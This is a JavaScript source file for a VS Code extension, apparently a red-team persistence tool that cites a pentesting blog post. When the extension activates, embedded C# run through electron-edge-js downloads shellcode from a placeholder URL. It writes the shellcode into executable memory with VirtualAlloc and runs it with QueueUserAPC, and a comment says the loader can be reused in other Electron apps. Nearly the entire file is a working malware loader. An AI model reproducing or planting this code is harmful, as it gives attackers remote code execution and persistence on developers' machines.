Persistence shellcode loader for VS Code plugins

vs-code-persistence-plugin.js

// The shellcode loader code can be used in other Node.js or Electron apps
// Requires installation of the electron-edge-js NPM package - https://www.npmjs.com/package/electron-edge-js
// Reference blog post - https://thevivi.net/blog/pentesting/2022-03-05-plugins-for-persistence/

const vscode = require('vscode');

function activate(context) {

	var edge = require('electron-edge-js');
	var sCode = edge.func(function() {/*
		using System;
		using System.Net;
		using System.Threading.Tasks;
		using System.Runtime.InteropServices;
		
		class Startup
		{
			[DllImport("kernel32.dll")]
			static extern IntPtr VirtualAlloc(IntPtr lpAddress, int dwSize, uint flAllocationType, uint flProtect);
			[DllImport("kernel32.dll")]
			private static extern IntPtr GetCurrentThread();
			[DllImport("kernel32.dll")]
			public static extern IntPtr QueueUserAPC(IntPtr pfnAPC, IntPtr hThread, IntPtr dwData);
	
			static void SelfInject(byte[] shellcode) 
			{
				var hMemory = VirtualAlloc(IntPtr.Zero, shellcode.Length, 0x1000 | 0x2000, 0x40);
				Marshal.Copy(shellcode, 0, hMemory, shellcode.Length);
				var currentThread = GetCurrentThread();
				QueueUserAPC(hMemory, currentThread, IntPtr.Zero);
			}
			
			public async Task<object> Invoke(object input)
			{
				var client = new WebClient();
				var buf = client.DownloadData("[URL-TO-SHELLCODE]");
				SelfInject(buf);
				return null;
			}
		}
	*/});
	
	sCode(null, function (error, result) {
		if (error) throw error;
	});
		
}

// this method is called when your extension is deactivated
function deactivate() {}

module.exports = {
	activate,
	deactivate
}